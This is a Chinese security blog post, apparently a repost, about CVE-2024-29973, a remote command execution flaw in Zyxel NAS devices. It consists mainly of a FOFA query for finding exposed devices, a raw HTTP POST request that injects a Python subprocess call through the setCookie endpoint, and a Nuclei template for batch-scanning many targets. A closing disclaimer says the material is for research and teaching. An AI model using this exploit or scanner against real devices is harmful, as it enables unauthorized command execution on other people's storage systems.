CVE-2024-29973 Zyxel-NAS设备存在远程命令执行漏洞

admin
admin
admin
138985
文章
114
评论
2024年6月23日18:30:29评论24 views字数 1792阅读5分58秒阅读模式

漏洞简介

CVE-2024-29973 Zyxel-NAS设备存在远程命令执行漏洞

    合勤科技(ZyXEL)是国际知名的网络宽带系统及解决方案供应商。2024年6月4日,启明星辰集团VSRC监测到Zyxel NAS设备中修复了多个漏洞,目前这些漏洞的技术细节及部分PoC已公开

资产详情

CVE-2024-29973 Zyxel-NAS设备存在远程命令执行漏洞
FoFa:body="/cmd,/ck6fup6/user_grp_cgi/cgi_modify_userinfo"

CVE-2024-29973 Zyxel-NAS设备存在远程命令执行漏洞CVE-2024-29973 Zyxel-NAS设备存在远程命令执行漏洞

CVE-2024-29973 Zyxel-NAS设备存在远程命令执行漏洞

漏洞复现

CVE-2024-29973 Zyxel-NAS设备存在远程命令执行漏洞
POST /cmd,/simZysh/register_main/setCookie HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryHHaZAYecVOf5sfa6------WebKitFormBoundaryHHaZAYecVOf5sfa6Content-Disposition: form-data; name="c0"storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("id", shell=True)#------WebKitFormBoundaryHHaZAYecVOf5sfa6--

CVE-2024-29973 Zyxel-NAS设备存在远程命令执行漏洞

  • Nuclei 批量检测POC
  • 所用方法nuclei.exe -l 网址文件.txt -t POC.yaml
id: Zyxel-NAS_setCookie_RCE

info:
  name: Zyxel-NAS_setCookie_RCE
  author: security-xm
  severity: high
  description: Zyxel-NAS设备 setCookie 远程命令执行漏洞 (CVE-2024-29973)
  metadata:
    max-request: 1
    shodan-query: ""
    verified: true

http:
- raw:
  - |+
    @timeout: 30s
    POST /cmd,/simZysh/register_main/setCookie HTTP/1.1
    Host: {{Hostname}}
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHHaZAYecVOf5sfa6
    Content-Length: 240

    ------WebKitFormBoundaryHHaZAYecVOf5sfa6
    Content-Disposition: form-data; name="c0"
    
    storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("id", shell=True)#
    ------WebKitFormBoundaryHHaZAYecVOf5sfa6--

  max-redirects: 3
  matchers-condition: and
  matchers:
    - type: word
      part: body
      words:
        - uid
大家多多关注公众号,一直更新优质文章哟
CVE-2024-29973 Zyxel-NAS设备存在远程命令执行漏洞

免责声明

CVE-2024-29973 Zyxel-NAS设备存在远程命令执行漏洞
CVE-2024-29973 Zyxel-NAS设备存在远程命令执行漏洞

    文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!

原文始发于微信公众号(星悦安全):CVE-2024-29973 Zyxel-NAS设备存在远程命令执行漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月23日18:30:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-29973 Zyxel-NAS设备存在远程命令执行漏洞https://cn-sec.com/archives/2876463.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息